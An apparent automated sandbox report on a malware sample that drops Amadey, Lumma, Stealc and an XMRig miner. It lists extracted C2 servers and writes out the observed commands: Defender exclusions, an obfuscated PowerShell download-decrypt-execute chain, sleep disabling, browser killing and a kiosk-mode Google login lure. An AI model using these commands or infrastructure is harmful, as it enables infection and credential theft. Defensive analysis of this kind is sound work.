Overview

overview

10

Static

static

3

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/12/2024, 07:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    3.1MB

  • MD5

    22bf111e0ffbce40da98521c8ac390ac

  • SHA1

    86c47f8fc939e81d7ceba37f1824e22ce4ef1f43

  • SHA256

    0536c8987bbf4c736ee1ffaba0cb1e52d1652574fcb80ab14ff7d23a40e446b2

  • SHA512

    a9d529513d988c20380432d0ce1f10b6286a949442f6964ba455d14f51d308810b495d6e04ec375c9a990230f04a1444e7a9647c205a38275aae08b34408d30e

  • SSDEEP

    98304:pLPTyc5Jt2SKP64GsNe+WPvvFmuY6/JsYk:xTyc7me+W3v9Y6

Score
10/10
amadeylummastealcxmrig9c9aa5stokdiscoveryevasionexecutionminerpersistencestealertrojanupx

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
    evasion
  • XMRig Miner payload 9 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 5 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 33 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe
        "C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3064
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C42B.tmp\C42C.tmp\C42D.bat C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe"
          4⤵
          • Drops startup file
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\system32\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3620
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:3608
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:632
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.bin'"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2028
            • C:\Windows\system32\timeout.exe
              timeout /t 10 /nobreak
              5⤵
              • Delays execution with timeout.exe
              PID:808
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5340
            • C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe
              "C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              PID:5504
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                6⤵
                  PID:5544
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5808
                • C:\Windows\explorer.exe
                  "C:\Windows\explorer.exe"
                  6⤵
                  • Suspicious behavior: MapViewOfSection
                  PID:5556
                  • C:\Windows\EXPLORER.EXE
                    C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                    7⤵
                      PID:5688
                    • C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                      "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5496
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        8⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5124
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        8⤵
                        • Power Settings
                        PID:5676
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        8⤵
                        • Power Settings
                        PID:4644
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        8⤵
                        • Power Settings
                        PID:5924
                      • C:\Windows\explorer.exe
                        explorer.exe
                        8⤵
                          PID:4792
              • C:\Users\Admin\AppData\Local\Temp\1013368001\2c0426f4b0.exe
                "C:\Users\Admin\AppData\Local\Temp\1013368001\2c0426f4b0.exe"
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2360
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1468
                  4⤵
                  • Program crash
                  PID:2200
              • C:\Users\Admin\AppData\Local\Temp\1013369001\dd6dc85460.exe
                "C:\Users\Admin\AppData\Local\Temp\1013369001\dd6dc85460.exe"
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3188
              • C:\Users\Admin\AppData\Local\Temp\1013370001\ff616072d7.exe
                "C:\Users\Admin\AppData\Local\Temp\1013370001\ff616072d7.exe"
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:1816
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2656
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3480
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4836
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:740
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3908
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4028
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    5⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:4380
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2004 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6407342a-0195-43cf-a6db-213f1bd86819} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" gpu
                      6⤵
                        PID:752
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7c4e15c-09ab-4de3-920b-d456b747ff31} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" socket
                        6⤵
                          PID:4892
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3260 -childID 1 -isForBrowser -prefsHandle 3196 -prefMapHandle 3384 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6928c85-3092-4fe1-9b0e-0af34aefb85f} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" tab
                          6⤵
                            PID:4200
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2592 -childID 2 -isForBrowser -prefsHandle 2872 -prefMapHandle 1288 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {282cc785-b6f1-4a61-8622-7f53cbd0b305} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" tab
                            6⤵
                              PID:3728
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4912 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4896 -prefMapHandle 4888 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {822597e6-2577-4a5a-922b-8a6db975529e} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" utility
                              6⤵
                              • Checks processor information in registry
                              PID:5624
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 3 -isForBrowser -prefsHandle 5476 -prefMapHandle 5524 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5c214ef-6e52-49fd-986c-9b47bde2c4aa} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" tab
                              6⤵
                                PID:1644
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 4 -isForBrowser -prefsHandle 5620 -prefMapHandle 5616 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f81b254c-3368-4f60-adae-feb92e5ed561} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" tab
                                6⤵
                                  PID:4360
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5840 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fad7bcbe-8528-426c-8c41-0bddd789047c} 4380 "\\.\pipe\gecko-crash-server-pipe.4380" tab
                                  6⤵
                                    PID:640
                            • C:\Users\Admin\AppData\Local\Temp\1013371001\d416c16af6.exe
                              "C:\Users\Admin\AppData\Local\Temp\1013371001\d416c16af6.exe"
                              3⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3988
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2360 -ip 2360
                          1⤵
                            PID:2760
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2360 -ip 2360
                            1⤵
                              PID:3868
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4576
                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2392

                            Network

                            MITRE ATT&CK Enterprise v15

                            Reconnaissance

                            Resource Development

                            Initial Access

                            Execution

                            Command and Scripting Interpreter

                            1
                            T1059

                            PowerShell

                            1
                            T1059.001

                            Persistence

                            Boot or Logon Autostart Execution

                            1
                            T1547

                            Registry Run Keys / Startup Folder

                            1
                            T1547.001

                            Create or Modify System Process

                            1
                            T1543

                            Windows Service

                            1
                            T1543.003

                            Power Settings

                            1
                            T1653

                            Privilege Escalation

                            Boot or Logon Autostart Execution

                            1
                            T1547

                            Registry Run Keys / Startup Folder

                            1
                            T1547.001

                            Create or Modify System Process

                            1
                            T1543

                            Windows Service

                            1
                            T1543.003

                            Defense Evasion

                            Impair Defenses

                            2
                            T1562

                            Disable or Modify Tools

                            2
                            T1562.001

                            Modify Registry

                            3
                            T1112

                            Virtualization/Sandbox Evasion

                            2
                            T1497

                            Credential Access

                            Discovery

                            Query Registry

                            6
                            T1012

                            System Information Discovery

                            4
                            T1082

                            System Location Discovery

                            1
                            T1614

                            System Language Discovery

                            1
                            T1614.001

                            Virtualization/Sandbox Evasion

                            2
                            T1497

                            Lateral Movement

                            Collection

                            Command and Control

                            Exfiltration

                            Impact

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                              Filesize

                              2.8MB

                              MD5

                              56ec5472231866630749ccf6977c4fbd

                              SHA1

                              03c5fe2e0dd49a554b354e7ef26f794f4aa86e9d

                              SHA256

                              e19905020c9685a68c3f4c9f62f57e4b21bc8dcfad567c89b0b37b42a120182b

                              SHA512

                              46274dfec96406c4bd101c6207c813e03b965e9f9a6b1b57147bcfb7d24a9180002c3b8001ac85a91dfd0b75f0aabba119e455d52fa847a751c32f00e3ad4753

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                              Filesize

                              2KB

                              MD5

                              d85ba6ff808d9e5444a4b369f5bc2730

                              SHA1

                              31aa9d96590fff6981b315e0b391b575e4c0804a

                              SHA256

                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                              SHA512

                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              a88a0fb4b50ea79bbe1ccf96b5227f41

                              SHA1

                              4c0a645cef81976c9799bab74aa15d62a11535aa

                              SHA256

                              a8552072dd8da80028459d4d2584b8ac8efef306b8969a80b3236f3f5cb6befe

                              SHA512

                              139233d2361e869e67d79ea4154f26d74854003d3c1ff237b99f42a51960f332cf6f4e62ebd6405466f90d9cc1937a2572760f093d7cc79d64990634ea610a8c

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              0dad0d57977024a11d87b257201ec93f

                              SHA1

                              2ab0fe8f65b06bba5065ea8163677a627d176b53

                              SHA256

                              f270e31f25c53a0bcee3388ceefb080643247f75f27184ab1c7701a6ecd713a3

                              SHA512

                              b191c0191274c03153a04a319d7ba40c4f4b8bf3481c67666e804c67048aca7fbcbd23f05c66ca8e55d8aa1e79ac8dcaa72d15ffcfc26930737e100b03dbf88c

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              944B

                              MD5

                              6d3e9c29fe44e90aae6ed30ccf799ca8

                              SHA1

                              c7974ef72264bbdf13a2793ccf1aed11bc565dce

                              SHA256

                              2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                              SHA512

                              60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\activity-stream.discovery_stream.json
                              Filesize

                              27KB

                              MD5

                              01e013c4929188747acf1d110c1fd3ae

                              SHA1

                              68c83ff6a2ef26884e1bccbc1835e0d0abe6f482

                              SHA256

                              68f9c53a5288fae45b84e08c554de9aaa2a78e78e9abf3665bdfc698f4fe952f

                              SHA512

                              44581813b80ea8039188b1e56414582eb2143a1d005016a14c2c84cd484413d137c65a23875f99871d4ac9313f1e228ed7fc3477aa89a81399508df57987f977

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
                              Filesize

                              13KB

                              MD5

                              c8cc90c54a3495205d5ec1eca9a63d28

                              SHA1

                              feac4d27041be016b5298aa410355b371f9a1192

                              SHA256

                              1602794f261c522949733659de77359213bb1b157406b297b84e75eca3abbf6c

                              SHA512

                              3b0f571fef098c189e375801cf0836d3225f5831b1a107b85940507f1128c3e4b6746fa1337a6804dda86b91a2e8fa11c147ba168c301904444b8b033d0a1097

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                              Filesize

                              15KB

                              MD5

                              96c542dec016d9ec1ecc4dddfcbaac66

                              SHA1

                              6199f7648bb744efa58acf7b96fee85d938389e4

                              SHA256

                              7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                              SHA512

                              cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1013367001\4ZAAIhb.exe
                              Filesize

                              121KB

                              MD5

                              a3d68745e8919e2a48d8fa0738da124e

                              SHA1

                              85ea6ab1d2d3f6af2011b130756d57f31539e171

                              SHA256

                              65bc085f99db63b0581b2153a0aa2d7151133aafeeb2810f56a5d17ef9760d46

                              SHA512

                              99575b08e17dd409e2cede4996bfc812ebe430a811f96b5c08e3093be8149e2aa148c4d7b71f1c24b5d2be592567494ea0118e355839fc83ab3603a34098a5ac

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1013368001\2c0426f4b0.exe
                              Filesize

                              1.8MB

                              MD5

                              f15a88b85afa75fb85fb70e83071e286

                              SHA1

                              f34100ebca880311df1082b72a01d380948c75ff

                              SHA256

                              b3e4be8c35c51703b96863766cef23d57c03a80425d9b3942ef99cd8f54a5950

                              SHA512

                              daff513539b56b38e47a6de1d1ad36d3510b96ed4121282fc6797533ce9de94c145e9bcce44fbb3cc123f3c1595299e3e0ab4c42913004d0153c4ec499669b51

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1013369001\dd6dc85460.exe
                              Filesize

                              1.7MB

                              MD5

                              1ccd476ef1cb8a55170a6ef196dfb053

                              SHA1

                              5bf1b3781099129a92a2925576c1628f65ac9e19

                              SHA256

                              9b25c62d773c36fe7bb6c02204f61b1ca0fd6c4d1a9f1245dd917e3439d01588

                              SHA512

                              9ffa61cf282f77a01855237bab9bbcb7bddb24383d643c7d89a58bda6f34b18f628ee743e1782aee3685d5bdf410472a857b035ceaa350d153154e1b50234513

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1013370001\ff616072d7.exe
                              Filesize

                              948KB

                              MD5

                              03c3b35f938a1bc015e2579a7fb58015

                              SHA1

                              3fdfb37c9eab06c72cf651157b9cfb6182fa468e

                              SHA256

                              130610fd4154cd5b5e146ad854fb21e0f694c35161be73d634b5aea9850e3e8b

                              SHA512

                              0c387b9f791286b427a12b0a4e43a7043065f3a6e40b0fe92ab80b3a52be8d0b2b71b5aa39bdc04c26e9b4f71e0cc337fd78ccbda4a3610d740421281f4e3553

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\1013371001\d416c16af6.exe
                              Filesize

                              2.6MB

                              MD5

                              a45a51347a496e17a3427a34e1b27447

                              SHA1

                              96a78501643cddc6085be113bcc1da7e3d6f8f51

                              SHA256

                              ab9ae453090cee1da838f1e17be5ecb435987168b10a649da876a6df6d27dc27

                              SHA512

                              e9c2ad3fbf06c23088a055c19cf449221c2dcfd0584648d01a86976400be4b590cf183065c9dac1166ad1f78d915d98913926dd1be1e01a1937ee458922365db

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\C42B.tmp\C42C.tmp\C42D.bat
                              Filesize

                              1KB

                              MD5

                              77ce738d9b82e6ebfcfa3f1081f037fc

                              SHA1

                              c4db7196464f86b05ac3532d99175d2eb09ca7dd

                              SHA256

                              24fefbb2301ebd0814fbee1edb6b28dafc871da247defa69bfa3fb999ac8d7c1

                              SHA512

                              52afe5faa53deb5d555a7a9fc0f5b8f57503f837bcc8b54e2b7d6819952644b8a6a077c77ef3fbf2af84ae78b086ab547af393f9290c1ec69929687d8837d70e

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\DATABASE
                              Filesize

                              48KB

                              MD5

                              349e6eb110e34a08924d92f6b334801d

                              SHA1

                              bdfb289daff51890cc71697b6322aa4b35ec9169

                              SHA256

                              c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                              SHA512

